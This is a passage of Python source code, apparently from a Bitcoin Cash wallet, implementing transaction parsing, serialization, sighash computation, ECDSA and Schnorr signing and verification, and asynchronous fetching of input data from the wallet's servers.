if scriptlen == 25 and _bytes.startswith(P2PKH_prefix) and _bytes.endswith(P2PKH_suffix):
# Pay-to-pubkey-hash
return TYPE_ADDRESS, Address.from_P2PKH_hash(_bytes[3:23])
if scriptlen == 35 and _bytes[0] == 33 and _bytes[1] in (2,3) and _bytes[34] == opcodes.OP_CHECKSIG:
# Pay-to-pubkey (compressed)
return TYPE_PUBKEY, PublicKey.from_pubkey(_bytes[1:34])
if scriptlen == 67 and _bytes[0] == 65 and _bytes[1] == 4 and _bytes[66] == opcodes.OP_CHECKSIG:
# Pay-to-pubkey (uncompressed)
return TYPE_PUBKEY, PublicKey.from_pubkey(_bytes[1:66])
# note: we don't recognize bare multisigs.
return TYPE_SCRIPT, ScriptOutput(bytes(_bytes))
def parse_input(vds):
d = {}
prevout_hash = hash_encode(vds.read_bytes(32))
prevout_n = vds.read_uint32()
scriptSig = vds.read_bytes(vds.read_compact_size())
sequence = vds.read_uint32()
d['prevout_hash'] = prevout_hash
d['prevout_n'] = prevout_n
d['sequence'] = sequence
d['address'] = UnknownAddress()
if prevout_hash == '00'*32:
d['type'] = 'coinbase'
d['scriptSig'] = bh2u(scriptSig)
else:
d['x_pubkeys'] = []
d['pubkeys'] = []
d['signatures'] = {}
d['address'] = None
d['type'] = 'unknown'
d['num_sig'] = 0
d['scriptSig'] = bh2u(scriptSig)
try:
parse_scriptSig(d, scriptSig)
except Exception as e:
print_error('{}: Failed to parse tx input {}:{}, probably a p2sh (non multisig?). Exception was: {}'.format(__name__, prevout_hash, prevout_n, repr(e)))
# that whole heuristic codepath is fragile; just ignore it when it dies.
# failing tx examples:
# 1c671eb25a20aaff28b2fa4254003c201155b54c73ac7cf9c309d835deed85ee
# 08e1026eaf044127d7103415570afd564dfac3131d7a5e4b645f591cd349bb2c
# override these once more just to make sure
d['address'] = UnknownAddress()
d['type'] = 'unknown'
if not Transaction.is_txin_complete(d):
del d['scriptSig']
d['value'] = vds.read_uint64()
return d
def parse_output(vds, i):
d = {}
d['value'] = vds.read_int64()
scriptPubKey = vds.read_bytes(vds.read_compact_size())
d['type'], d['address'] = get_address_from_output_script(scriptPubKey)
d['scriptPubKey'] = bh2u(scriptPubKey)
d['prevout_n'] = i
return d
def deserialize(raw):
vds = BCDataStream()
vds.write(bfh(raw))
d = {}
start = vds.read_cursor
d['version'] = vds.read_int32()
n_vin = vds.read_compact_size()
d['inputs'] = [parse_input(vds) for i in range(n_vin)]
n_vout = vds.read_compact_size()
d['outputs'] = [parse_output(vds, i) for i in range(n_vout)]
d['lockTime'] = vds.read_uint32()
if vds.can_read_more():
raise SerializationError('extra junk at the end')
return d
# pay & redeem scripts
def multisig_script(public_keys, m):
n = len(public_keys)
assert n <= 15
assert m <= n
op_m = format(opcodes.OP_1 + m - 1, 'x')
op_n = format(opcodes.OP_1 + n - 1, 'x')
keylist = [op_push(len(k)//2) + k for k in public_keys]
return op_m + ''.join(keylist) + op_n + 'ae'
class Transaction:
SIGHASH_FORKID = 0x40 # do not use this; deprecated
FORKID = 0x000000 # do not use this; deprecated
def __str__(self):
if self.raw is None:
self.raw = self.serialize()
return self.raw
def __init__(self, raw, sign_schnorr=False):
if raw is None:
self.raw = None
elif isinstance(raw, str):
self.raw = raw.strip() if raw else None
elif isinstance(raw, dict):
self.raw = raw['hex']
else:
raise BaseException("cannot initialize transaction", raw)
self._inputs = None
self._outputs = None
self.locktime = 0
self.version = 1
self._sign_schnorr = sign_schnorr
# attribute used by HW wallets to tell the hw keystore about any outputs
# in the tx that are to self (change), etc. See wallet.py add_hw_info
# which writes to this dict and the various hw wallet plugins which
# read this dict.
self.output_info = dict()
# Ephemeral meta-data used internally to keep track of interesting
# things. This is currently written-to by coinchooser to tell UI code
# about 'dust_to_fee', which is change that's too small to go to change
# outputs (below dust threshold) and needed to go to the fee.
#
# It is also used to store the 'fetched_inputs' which are asynchronously
# retrieved inputs (by retrieving prevout_hash tx's), see
#`fetch_input_data`.
#
# Values in this dict are advisory only and may or may not always be
# there!
self.ephemeral = dict()
def set_sign_schnorr(self, b):
self._sign_schnorr = b
def update(self, raw):
self.raw = raw
self._inputs = None
self.deserialize()
def inputs(self):
if self._inputs is None:
self.deserialize()
return self._inputs
def outputs(self):
if self._outputs is None:
self.deserialize()
return self._outputs
@classmethod
def get_sorted_pubkeys(self, txin):
# sort pubkeys and x_pubkeys, using the order of pubkeys
x_pubkeys = txin['x_pubkeys']
pubkeys = txin.get('pubkeys')
if pubkeys is None:
pubkeys = [xpubkey_to_pubkey(x) for x in x_pubkeys]
pubkeys, x_pubkeys = zip(*sorted(zip(pubkeys, x_pubkeys)))
txin['pubkeys'] = pubkeys = list(pubkeys)
txin['x_pubkeys'] = x_pubkeys = list(x_pubkeys)
return pubkeys, x_pubkeys
def update_signatures(self, signatures):
"""Add new signatures to a transaction
`signatures` is expected to be a list of hex encoded sig strings with
*no* sighash byte at the end (implicitly always 0x41 (SIGHASH_FORKID|SIGHASH_ALL);
will be added by this function).
signatures[i] is intended for self._inputs[i].
The signature will be matched with the appropriate pubkey automatically
in the case of multisignature wallets.
This function is used by the Trezor, KeepKey, etc to update the
transaction with signatures form the device.
Note this function supports both Schnorr and ECDSA signatures, but as
yet no hardware wallets are signing Schnorr.
"""
if self.is_complete():
return
if not isinstance(signatures, (tuple, list)):
raise Exception('API changed: update_signatures expects a list.')
if len(self.inputs()) != len(signatures):
raise Exception('expected {} signatures; got {}'.format(len(self.inputs()), len(signatures)))
for i, txin in enumerate(self.inputs()):
pubkeys, x_pubkeys = self.get_sorted_pubkeys(txin)
sig = signatures[i]
if not isinstance(sig, str):
raise ValueError("sig was bytes, expected string")
# sig_final is the signature with the sighashbyte at the end (0x41)
sig_final = sig + '41'
if sig_final in txin.get('signatures'):
# skip if we already have this signature
continue
pre_hash = Hash(bfh(self.serialize_preimage(i)))
sig_bytes = bfh(sig)
added = False
reason = []
for j, pubkey in enumerate(pubkeys):
# see which pubkey matches this sig (in non-multisig only 1 pubkey, in multisig may be multiple pubkeys)
if self.verify_signature(bfh(pubkey), sig_bytes, pre_hash, reason):
print_error("adding sig", i, j, pubkey, sig_final)
self._inputs[i]['signatures'][j] = sig_final
added = True
if not added:
resn = ', '.join(reversed(reason)) if reason else ''
print_error("failed to add signature {} for any pubkey for reason(s): '{}' ; pubkey(s) / sig / pre_hash = ".format(i, resn),
pubkeys, '/', sig, '/', bh2u(pre_hash))
# redo raw
self.raw = self.serialize()
def is_schnorr_signed(self, input_idx):
''' Return True IFF any of the signatures for a particular input
are Schnorr signatures (Schnorr signatures are always 64 bytes + 1) '''
if (isinstance(self._inputs, (list, tuple))
and input_idx < len(self._inputs)
and self._inputs[input_idx]):
# Schnorr sigs are always 64 bytes. However the sig has a hash byte
# at the end, so that's 65. Plus we are hex encoded, so 65*2=130
return any(isinstance(sig, (str, bytes)) and len(sig) == 130
for sig in self._inputs[input_idx].get('signatures', []))
return False
def deserialize(self):
if self.raw is None:
return
if self._inputs is not None:
return
d = deserialize(self.raw)
self.invalidate_common_sighash_cache()
self._inputs = d['inputs']
self._outputs = [(x['type'], x['address'], x['value']) for x in d['outputs']]
assert all(isinstance(output[1], (PublicKey, Address, ScriptOutput))
for output in self._outputs)
self.locktime = d['lockTime']
self.version = d['version']
return d
@classmethod
def from_io(klass, inputs, outputs, locktime=0, sign_schnorr=False):
assert all(isinstance(output[1], (PublicKey, Address, ScriptOutput))
for output in outputs)
self = klass(None)
self._inputs = inputs
self._outputs = outputs.copy()
self.locktime = locktime
self.set_sign_schnorr(sign_schnorr)
return self
@classmethod
def pay_script(self, output):
return output.to_script().hex()
@classmethod
def estimate_pubkey_size_from_x_pubkey(cls, x_pubkey):
try:
if x_pubkey[0:2] in ['02', '03']: # compressed pubkey
return 0x21
elif x_pubkey[0:2] == '04': # uncompressed pubkey
return 0x41
elif x_pubkey[0:2] == 'ff': # bip32 extended pubkey
return 0x21
elif x_pubkey[0:2] == 'fe': # old electrum extended pubkey
return 0x41
except Exception as e:
pass
return 0x21 # just guess it is compressed
@classmethod
def estimate_pubkey_size_for_txin(cls, txin):
pubkeys = txin.get('pubkeys', [])
x_pubkeys = txin.get('x_pubkeys', [])
if pubkeys and len(pubkeys) > 0:
return cls.estimate_pubkey_size_from_x_pubkey(pubkeys[0])
elif x_pubkeys and len(x_pubkeys) > 0:
return cls.estimate_pubkey_size_from_x_pubkey(x_pubkeys[0])
else:
return 0x21 # just guess it is compressed
@classmethod
def get_siglist(self, txin, estimate_size=False, sign_schnorr=False):
# if we have enough signatures, we use the actual pubkeys
# otherwise, use extended pubkeys (with bip32 derivation)
num_sig = txin.get('num_sig', 1)
if estimate_size:
pubkey_size = self.estimate_pubkey_size_for_txin(txin)
pk_list = ["00" * pubkey_size] * len(txin.get('x_pubkeys', [None]))
# we assume that signature will be 0x48 bytes long if ECDSA, 0x41 if Schnorr
if sign_schnorr:
siglen = 0x41
else:
siglen = 0x48
sig_list = [ "00" * siglen ] * num_sig
else:
pubkeys, x_pubkeys = self.get_sorted_pubkeys(txin)
x_signatures = txin['signatures']
signatures = list(filter(None, x_signatures))
is_complete = len(signatures) == num_sig
if is_complete:
pk_list = pubkeys
sig_list = signatures
else:
pk_list = x_pubkeys
sig_list = [sig if sig else NO_SIGNATURE for sig in x_signatures]
return pk_list, sig_list
@classmethod
def input_script(self, txin, estimate_size=False, sign_schnorr=False):
# For already-complete transactions, scriptSig will be set and we prefer
# to use it verbatim in order to get an exact reproduction (including
# malleated push opcodes, etc.).
scriptSig = txin.get('scriptSig', None)
if scriptSig is not None:
return scriptSig
# For partially-signed inputs, or freshly signed transactions, the
# scriptSig will be missing and so we construct it from pieces.
_type = txin['type']
if _type == 'coinbase':
raise RuntimeError('Attempted to serialize coinbase with missing scriptSig')
pubkeys, sig_list = self.get_siglist(txin, estimate_size, sign_schnorr=sign_schnorr)
script = ''.join(push_script(x) for x in sig_list)
if _type == 'p2pk':
pass
elif _type == 'p2sh':
# put op_0 before script
script = '00' + script
redeem_script = multisig_script(pubkeys, txin['num_sig'])
script += push_script(redeem_script)
elif _type == 'p2pkh':
script += push_script(pubkeys[0])
elif _type == 'unknown':
raise RuntimeError('Cannot serialize unknown input with missing scriptSig')
return script
@classmethod
def is_txin_complete(cls, txin):
if txin['type'] == 'coinbase':
return True
num_sig = txin.get('num_sig', 1)
if num_sig == 0:
return True
x_signatures = txin['signatures']
signatures = list(filter(None, x_signatures))
return len(signatures) == num_sig
@classmethod
def get_preimage_script(self, txin):
_type = txin['type']
if _type == 'p2pkh':
return txin['address'].to_script().hex()
elif _type == 'p2sh':
pubkeys, x_pubkeys = self.get_sorted_pubkeys(txin)
return multisig_script(pubkeys, txin['num_sig'])
elif _type == 'p2pk':
pubkey = txin['pubkeys'][0]
return public_key_to_p2pk_script(pubkey)
elif _type == 'unknown':
# this approach enables most P2SH smart contracts (but take care if using OP_CODESEPARATOR)
return txin['scriptCode']
else:
raise RuntimeError('Unknown txin type', _type)
@classmethod
def serialize_outpoint(self, txin):
return bh2u(bfh(txin['prevout_hash'])[::-1]) + int_to_hex(txin['prevout_n'], 4)
@classmethod
def serialize_input(self, txin, script, estimate_size=False):
# Prev hash and index
s = self.serialize_outpoint(txin)
# Script length, script, sequence
s += var_int(len(script)//2)
s += script
s += int_to_hex(txin.get('sequence', 0xffffffff - 1), 4)
# offline signing needs to know the input value
if ('value' in txin
and txin.get('scriptSig') is None
and not (estimate_size or self.is_txin_complete(txin))):
s += int_to_hex(txin['value'], 8)
return s
def BIP_LI01_sort(self):
# See https://github.com/kristovatlas/rfc/blob/master/bips/bip-li01.mediawiki
self._inputs.sort(key = lambda i: (i['prevout_hash'], i['prevout_n']))
self._outputs.sort(key = lambda o: (o[2], self.pay_script(o[1])))
def serialize_output(self, output):
output_type, addr, amount = output
s = int_to_hex(amount, 8)
script = self.pay_script(addr)
s += var_int(len(script)//2)
s += script
return s
@classmethod
def nHashType(cls):
'''Hash type in hex.'''
warnings.warn("warning: deprecated tx.nHashType()", FutureWarning, stacklevel=2)
return 0x01 | (cls.SIGHASH_FORKID + (cls.FORKID << 8))
def invalidate_common_sighash_cache(self):
''' Call this to invalidate the cached common sighash (computed by
`calc_common_sighash` below).
This is function is for advanced usage of this class where the caller
has mutated the transaction after computing its signatures and would
like to explicitly delete the cached common sighash. See
`calc_common_sighash` below. '''
try: del self._cached_sighash_tup
except AttributeError: pass
def calc_common_sighash(self, use_cache=False):
""" Calculate the common sighash components that are used by
transaction signatures. If `use_cache` enabled then this will return
already-computed values from the `._cached_sighash_tup` attribute, or
compute them if necessary (and then store).
For transactions with N inputs and M outputs, calculating all sighashes
takes only O(N + M) with the cache, as opposed to O(N^2 + NM) without
the cache.
Returns three 32-long bytes objects: (hashPrevouts, hashSequence, hashOutputs).
Warning: If you modify non-signature parts of the transaction
afterwards, this cache will be wrong! """
inputs = self.inputs()
outputs = self.outputs()
meta = (len(inputs), len(outputs))
if use_cache:
try:
cmeta, res = self._cached_sighash_tup
except AttributeError:
pass
else:
# minimal heuristic check to detect bad cached value
if cmeta == meta:
# cache hit and heuristic check ok
return res
else:
del cmeta, res, self._cached_sighash_tup
hashPrevouts = Hash(bfh(''.join(self.serialize_outpoint(txin) for txin in inputs)))
hashSequence = Hash(bfh(''.join(int_to_hex(txin.get('sequence', 0xffffffff - 1), 4) for txin in inputs)))
hashOutputs = Hash(bfh(''.join(self.serialize_output(o) for o in outputs)))
res = hashPrevouts, hashSequence, hashOutputs
# cach resulting value, along with some minimal metadata to defensively
# program against cache invalidation (due to class mutation).
self._cached_sighash_tup = meta, res
return res
def serialize_preimage(self, i, nHashType=0x00000041, use_cache = False):
""" See `.calc_common_sighash` for explanation of use_cache feature """
if (nHashType & 0xff) != 0x41:
raise ValueError("other hashtypes not supported; submit a PR to fix this!")
nVersion = int_to_hex(self.version, 4)
nHashType = int_to_hex(nHashType, 4)
nLocktime = int_to_hex(self.locktime, 4)
txin = self.inputs()[i]
outpoint = self.serialize_outpoint(txin)
preimage_script = self.get_preimage_script(txin)
scriptCode = var_int(len(preimage_script) // 2) + preimage_script
try:
amount = int_to_hex(txin['value'], 8)
except KeyError:
raise InputValueMissing
nSequence = int_to_hex(txin.get('sequence', 0xffffffff - 1), 4)
hashPrevouts, hashSequence, hashOutputs = self.calc_common_sighash(use_cache = use_cache)
preimage = nVersion + bh2u(hashPrevouts) + bh2u(hashSequence) + outpoint + scriptCode + amount + nSequence + bh2u(hashOutputs) + nLocktime + nHashType
return preimage
def serialize(self, estimate_size=False):
nVersion = int_to_hex(self.version, 4)
nLocktime = int_to_hex(self.locktime, 4)
inputs = self.inputs()
outputs = self.outputs()
txins = var_int(len(inputs)) + ''.join(self.serialize_input(txin, self.input_script(txin, estimate_size, self._sign_schnorr), estimate_size) for txin in inputs)
txouts = var_int(len(outputs)) + ''.join(self.serialize_output(o) for o in outputs)
return nVersion + txins + txouts + nLocktime
def hash(self):
warnings.warn("warning: deprecated tx.hash()", FutureWarning, stacklevel=2)
return self.txid()
def txid(self):
if not self.is_complete():
return None
ser = self.serialize()
return self._txid(ser)
def txid_fast(self):
''' Returns the txid by immediately calculating it from self.raw,
which is faster than calling txid() which does a full re-serialize
each time. Note this should only be used for tx's that you KNOW are
complete and that don't contain our funny serialization hacks.
(The is_complete check is also not performed here because that
potentially can lead to unwanted tx deserialization). '''
if self.raw:
return self._txid(self.raw)
return self.txid()
@staticmethod
def _txid(raw_hex : str) -> str:
return bh2u(Hash(bfh(raw_hex))[::-1])
def add_inputs(self, inputs):
self._inputs.extend(inputs)
self.raw = None
def add_outputs(self, outputs):
assert all(isinstance(output[1], (PublicKey, Address, ScriptOutput))
for output in outputs)
self._outputs.extend(outputs)
self.raw = None
def input_value(self):
''' Will return the sum of all input values, if the input values
are known (may consult self.fetched_inputs() to get a better idea of
possible input values). Will raise InputValueMissing if input values
are missing. '''
try:
return sum(x['value'] for x in (self.fetched_inputs() or self.inputs()))
except (KeyError, TypeError, ValueError) as e:
raise InputValueMissing from e
def output_value(self):
return sum(val for tp, addr, val in self.outputs())
def get_fee(self):
''' Try and calculate the fee based on the input data, and returns it as
satoshis (int). Can raise InputValueMissing on tx's where fee data is
missing, so client code should catch that. '''
# first, check if coinbase; coinbase tx always has 0 fee
if self.inputs() and self._inputs[0].get('type') == 'coinbase':
return 0
# otherwise just sum up all values - may raise InputValueMissing
return self.input_value() - self.output_value()
@profiler
def estimated_size(self):
'''Return an estimated tx size in bytes.'''
return (len(self.serialize(True)) // 2 if not self.is_complete() or self.raw is None
else len(self.raw) // 2) # ASCII hex string
@classmethod
def estimated_input_size(self, txin, sign_schnorr=False):
'''Return an estimated of serialized input size in bytes.'''
script = self.input_script(txin, True, sign_schnorr=sign_schnorr)
return len(self.serialize_input(txin, script, True)) // 2 # ASCII hex string
def signature_count(self):
r = 0
s = 0
for txin in self.inputs():
if txin['type'] == 'coinbase':
continue
signatures = list(filter(None, txin.get('signatures',[])))
s += len(signatures)
r += txin.get('num_sig',-1)
return s, r
def is_complete(self):
s, r = self.signature_count()
return r == s
@staticmethod
def verify_signature(pubkey, sig, msghash, reason=None):
''' Given a pubkey (bytes), signature (bytes -- without sighash byte),
and a sha256d message digest, returns True iff the signature is good
for the given public key, False otherwise. Does not raise normally
unless given bad or garbage arguments.
Optional arg 'reason' should be a list which will have a string pushed
at the front (failure reason) on False return. '''
if (any(not arg or not isinstance(arg, bytes) for arg in (pubkey, sig, msghash))
or len(msghash) != 32):
raise ValueError('bad arguments to verify_signature')
if len(sig) == 64:
# Schnorr signatures are always exactly 64 bytes
return schnorr.verify(pubkey, sig, msghash)
else:
from ecdsa import BadSignatureError, BadDigestError
from ecdsa.der import UnexpectedDER
# ECDSA signature
try:
pubkey_point = ser_to_point(pubkey)
vk = MyVerifyingKey.from_public_point(pubkey_point, curve=SECP256k1)
if vk.verify_digest(sig, msghash, sigdecode = ecdsa.util.sigdecode_der):
return True
except (AssertionError, ValueError, TypeError,
BadSignatureError, BadDigestError, UnexpectedDER) as e:
# ser_to_point will fail if pubkey is off-curve, infinity, or garbage.
# verify_digest may also raise BadDigestError and BadSignatureError
if isinstance(reason, list):
reason.insert(0, repr(e))
except BaseException as e:
print_error("[Transaction.verify_signature] unexpected exception", repr(e))
if isinstance(reason, list):
reason.insert(0, repr(e))
return False
@staticmethod
def _ecdsa_sign(sec, pre_hash):
pkey = regenerate_key(sec)
secexp = pkey.secret
private_key = MySigningKey.from_secret_exponent(secexp, curve = SECP256k1)
public_key = private_key.get_verifying_key()
sig = private_key.sign_digest_deterministic(pre_hash, hashfunc=hashlib.sha256, sigencode = ecdsa.util.sigencode_der)
assert public_key.verify_digest(sig, pre_hash, sigdecode = ecdsa.util.sigdecode_der)
return sig
@staticmethod
def _schnorr_sign(pubkey, sec, pre_hash):
pubkey = bytes.fromhex(pubkey)
sig = schnorr.sign(sec, pre_hash)
assert schnorr.verify(pubkey, sig, pre_hash) # verify what we just signed
return sig
def sign(self, keypairs, *, use_cache=False):
for i, txin in enumerate(self.inputs()):
pubkeys, x_pubkeys = self.get_sorted_pubkeys(txin)
for j, (pubkey, x_pubkey) in enumerate(zip(pubkeys, x_pubkeys)):
if self.is_txin_complete(txin):
# txin is complete
break
if pubkey in keypairs:
_pubkey = pubkey
kname = 'pubkey'
elif x_pubkey in keypairs:
_pubkey = x_pubkey
kname = 'x_pubkey'
else:
continue
print_error(f"adding signature for input#{i} sig#{j}; {kname}: {_pubkey} schnorr: {self._sign_schnorr}")
sec, compressed = keypairs.get(_pubkey)
self._sign_txin(i, j, sec, compressed, use_cache=use_cache)
print_error("is_complete", self.is_complete())
self.raw = self.serialize()
def _sign_txin(self, i, j, sec, compressed, *, use_cache=False):
'''Note: precondition is self._inputs is valid (ie: tx is already deserialized)'''
pubkey = public_key_from_private_key(sec, compressed)
# add signature
nHashType = 0x00000041 # hardcoded, perhaps should be taken from unsigned input dict
pre_hash = Hash(bfh(self.serialize_preimage(i, nHashType, use_cache=use_cache)))
if self._sign_schnorr:
sig = self._schnorr_sign(pubkey, sec, pre_hash)
else:
sig = self._ecdsa_sign(sec, pre_hash)
reason = []
if not self.verify_signature(bfh(pubkey), sig, pre_hash, reason=reason):
print_error(f"Signature verification failed for input#{i} sig#{j}, reason: {str(reason)}")
return None
txin = self._inputs[i]
txin['signatures'][j] = bh2u(sig + bytes((nHashType & 0xff,)))
txin['pubkeys'][j] = pubkey # needed for fd keys
return txin
def get_outputs(self):
"""convert pubkeys to addresses"""
o = []
for type, addr, v in self.outputs():
o.append((addr,v)) # consider using yield (addr, v)
return o
def get_output_addresses(self):
return [addr for addr, val in self.get_outputs()]
def has_address(self, addr):
return (addr in self.get_output_addresses()) or (addr in (tx.get("address") for tx in self.inputs()))
def is_final(self):
return not any([x.get('sequence', 0xffffffff - 1) < 0xffffffff - 1
for x in self.inputs()])
def as_dict(self):
if self.raw is None:
self.raw = self.serialize()
self.deserialize()
out = {
'hex': self.raw,
'complete': self.is_complete(),
'final': self.is_final(),
}
return out
# This cache stores foreign (non-wallet) tx's we fetched from the network
# for the purposes of the "fetch_input_data" mechanism. Its max size has
# been thoughtfully calibrated to provide a decent tradeoff between
# memory consumption and UX.
#
# In even aggressive/pathological cases this cache won't ever exceed
# 100MB even when full. [see ExpiringCache.size_bytes() to test it].
# This is acceptable considering this is Python + Qt and it eats memory
# anyway.. and also this is 2019 ;). Note that all tx's in this cache
# are in the non-deserialized state (hex encoded bytes only) as a memory
# savings optimization. Please maintain that invariant if you modify this
# code, otherwise the cache may grow to 10x memory consumption if you
# put deserialized tx's in here.
_fetched_tx_cache = ExpiringCache(maxlen=1000, name="TransactionFetchCache")
def fetch_input_data(self, wallet, done_callback=None, done_args=tuple(),
prog_callback=None, *, force=False, use_network=True):
'''
Fetch all input data and put it in the 'ephemeral' dictionary, under
'fetched_inputs'. This call potentially initiates fetching of
prevout_hash transactions from the network for all inputs to this tx.
The fetched data is basically used for the Transaction dialog to be able
to display fee, actual address, and amount (value) for tx inputs.
`wallet` should ideally have a network object, but this function still
will work and is still useful if it does not.
`done_callback` is called with `done_args` (only if True was returned),
upon completion. Note that done_callback won't be called if this function
returns False. Also note that done_callback runs in a non-main thread
context and as such, if you want to do GUI work from within it, use
the appropriate Qt signal/slot mechanism to dispatch work to the GUI.
`prog_callback`, if specified, is called periodically to indicate
progress after inputs are retrieved, and it is passed a single arg,
"percent" (eg: 5.1, 10.3, 26.3, 76.1, etc) to indicate percent progress.
Note 1: Results (fetched transactions) are cached, so subsequent
calls to this function for the same transaction are cheap.
Note 2: Multiple, rapid calls to this function will cause the previous
asynchronous fetch operation (if active) to be canceled and only the
latest call will result in the invocation of the done_callback if/when
it completes.
'''
if not self._inputs:
return False
if force:
# forced-run -- start with empty list
inps = []
else:
# may be a new list or list that was already in dict
inps = self.fetched_inputs(require_complete = True)
if len(self._inputs) == len(inps):
# we already have results, don't do anything.
return False
eph = self.ephemeral
eph['fetched_inputs'] = inps = inps.copy() # paranoia: in case another thread is running on this list
# Lazy imports to keep this functionality very self-contained
# These modules are always available so no need to globally import them.
import threading
import queue
import time
from copy import deepcopy
from collections import defaultdict
t0 = time.time()
t = None
cls = __class__
self_txid = self.txid()
def doIt():
'''
This function is seemingly complex, but it's really conceptually
simple:
1. Fetch all prevouts either from cache (wallet or global tx_cache)
2. Or, if they aren't in either cache, then we will asynchronously
queue the raw tx gets to the network in parallel, across *all*
our connected servers. This is very fast, and spreads the load
around.
Tested with a huge tx of 600+ inputs all coming from different
prevout_hashes on mainnet, and it's super fast:
cd8fcc8ad75267ff9ad314e770a66a9e871be7882b7c05a7e5271c46bfca98bc '''
last_prog = -9999.0
need_dl_txids = defaultdict(list) # the dict of txids we will need to download (wasn't in cache)
def prog(i, prog_total=100):
''' notify interested code about progress '''
nonlocal last_prog
if prog_callback:
prog = ((i+1)*100.0)/prog_total
if prog - last_prog > 5.0:
prog_callback(prog)
last_prog = prog
while eph.get('_fetch') == t and len(inps) < len(self._inputs):
i = len(inps)
inp = deepcopy(self._inputs[i])
typ, prevout_hash, n, addr, value = inp.get('type'), inp.get('prevout_hash'), inp.get('prevout_n'), inp.get('address'), inp.get('value')
if not prevout_hash or n is None:
raise RuntimeError('Missing prevout_hash and/or prevout_n')
if typ != 'coinbase' and (not isinstance(addr, Address) or value is None):
tx = cls.tx_cache_get(prevout_hash) or wallet.transactions.get(prevout_hash)
if tx:
# Tx was in cache or wallet.transactions, proceed
# note that the tx here should be in the "not
# deserialized" state
if tx.raw:
# Note we deserialize a *copy* of the tx so as to
# save memory. We do not want to deserialize the
# cached tx because if we do so, the cache will
# contain a deserialized tx which will take up
# several times the memory when deserialized due to
# Python's memory use being less efficient than the
# binary-only raw bytes. So if you modify this code
# do bear that in mind.
tx = Transaction(tx.raw)
try:
tx.deserialize()
# The below txid check is commented-out as
# we trust wallet tx's and the network
# tx's that fail this check are never
# put in cache anyway.
#txid = tx._txid(tx.raw)
#if txid != prevout_hash: # sanity check
# print_error("fetch_input_data: cached prevout_hash {} != tx.txid() {}, ignoring.".format(prevout_hash, txid))
except Exception as e:
print_error("fetch_input_data: WARNING failed to deserialize {}: {}".format(prevout_hash, repr(e)))
tx = None
else:
tx = None
print_error("fetch_input_data: WARNING cached tx lacked any 'raw' bytes for {}".format(prevout_hash))
# now, examine the deserialized tx, if it's still good
if tx:
if n < len(tx.outputs()):
outp = tx.outputs()[n]
addr, value = outp[1], outp[2]
inp['value'] = value
inp['address'] = addr
print_error("fetch_input_data: fetched cached", i, addr, value)
else:
print_error("fetch_input_data: ** FIXME ** should never happen -- n={} >= len(tx.outputs())={} for prevout {}".format(n, len(tx.outputs()), prevout_hash))
else:
# tx was not in cache or wallet.transactions, mark
# it for download below (this branch can also execute
# in the unlikely case where there was an error above)
need_dl_txids[prevout_hash].append((i, n)) # remember the input# as well as the prevout_n
inps.append(inp) # append either cached result or as-yet-incomplete copy of _inputs[i]
# Now, download the tx's we didn't find above if network is available
# and caller said it's ok to go out ot network.. otherwise just return
# what we have
if use_network and eph.get('_fetch') == t and wallet.network:
callback_funcs_to_cancel = set()
try: # the whole point of this try block is the `finally` way below...
prog(-1) # tell interested code that progress is now 0%
# Next, queue the transaction.get requests, spreading them
# out randomly over the connected interfaces
q = queue.Queue()
q_ct = 0
bad_txids = set()
def put_in_queue_and_cache(r):
''' we cache the results directly in the network callback
as even if the user cancels the operation, we would like
to save the returned tx in our cache, since we did the
work to retrieve it anyway. '''
q.put(r) # put the result in the queue no matter what it is
txid = ''
try:
# Below will raise if response was 'error' or
# otherwise invalid. Note: for performance reasons
# we don't validate the tx here or deserialize it as
# this function runs in the network thread and we
# don't want to eat up that thread's CPU time
# needlessly. Also note the cache doesn't store
# deserializd tx's so as to save memory. We
# always deserialize a copy when reading the cache.
tx = Transaction(r['result'])
txid = r['params'][0]
assert txid == cls._txid(tx.raw), "txid-is-sane-check" # protection against phony responses
cls.tx_cache_put(tx=tx, txid=txid) # save tx to cache here
except Exception as e:
# response was not valid, ignore (don't cache)
if txid: # txid may be '' if KeyError from r['result'] above
bad_txids.add(txid)
print_error("fetch_input_data: put_in_queue_and_cache fail for txid:", txid, repr(e))
for txid, l in need_dl_txids.items():
wallet.network.queue_request('blockchain.transaction.get', [txid],
interface='random',
callback=put_in_queue_and_cache)
callback_funcs_to_cancel.add(put_in_queue_and_cache)
q_ct += 1
def get_bh():
if eph.get('block_height'):
return False
lh = wallet.network.get_server_height() or wallet.get_local_height()
def got_tx_info(r):
q.put('block_height') # indicate to other thread we got the block_height reply from network
try:
confs = r.get('result').get('confirmations', 0) # will raise of error reply
if confs and lh:
# the whole point.. was to get this piece of data.. the block_height
eph['block_height'] = bh = lh - confs + 1
print_error('fetch_input_data: got tx block height', bh)
else:
print_error('fetch_input_data: tx block height could not be determined')
except Exception as e:
print_error('fetch_input_data: get_bh fail:', str(e), r)
if self_txid:
wallet.network.queue_request('blockchain.transaction.get', [self_txid,True],
interface=None, callback=got_tx_info)
callback_funcs_to_cancel.add(got_tx_info)
return True
if get_bh():
q_ct += 1
class ErrorResp(Exception):
pass
for i in range(q_ct):
# now, read the q back, with a 10 second timeout, and
# populate the inputs
try:
r = q.get(timeout=10)
if eph.get('_fetch') != t:
# early abort from func, canceled
break
if r == 'block_height':
# ignore block_height reply from network.. was already processed in other thread in got_tx_info above
continue
if r.get('error'):
msg = r.get('error')
if isinstance(msg, dict):
msg = msg.get('message') or 'unknown error'
raise ErrorResp(msg)
rawhex = r['result']
txid = r['params'][0]
assert txid not in bad_txids, "txid marked bad" # skip if was marked bad by our callback code
tx = Transaction(rawhex); tx.deserialize()
for item in need_dl_txids[txid]:
ii, n = item
assert n < len(tx.outputs())
outp = tx.outputs()[n]
addr, value = outp[1], outp[2]
inps[ii]['value'] = value
inps[ii]['address'] = addr
print_error("fetch_input_data: fetched from network", ii, addr, value)
prog(i, q_ct) # tell interested code of progress
except queue.Empty:
print_error("fetch_input_data: timed out after 10.0s fetching from network, giving up.")
break
except Exception as e:
print_error("fetch_input_data:", repr(e))
finally:
# force-cancel any extant requests -- this is especially
# crucial on error/timeout/failure.
for func in callback_funcs_to_cancel:
wallet.network.cancel_requests(func)
if len(inps) == len(self._inputs) and eph.get('_fetch') == t: # sanity check
eph.pop('_fetch', None) # potential race condition here, popping wrong t -- but in practice w/ CPython threading it won't matter
print_error(f"fetch_input_data: elapsed {(time.time()-t0):.4f} sec")
if done_callback:
done_callback(*done_args)
# /doIt
t = threading.Thread(target=doIt, daemon=True)
eph['_fetch'] = t
t.start()
return True
def fetched_inputs(self, *, require_complete=False):
''' Returns the complete list of asynchronously fetched inputs for
this tx, if they exist. If the list is not yet fully retrieved, and
require_complete == False, returns what it has so far
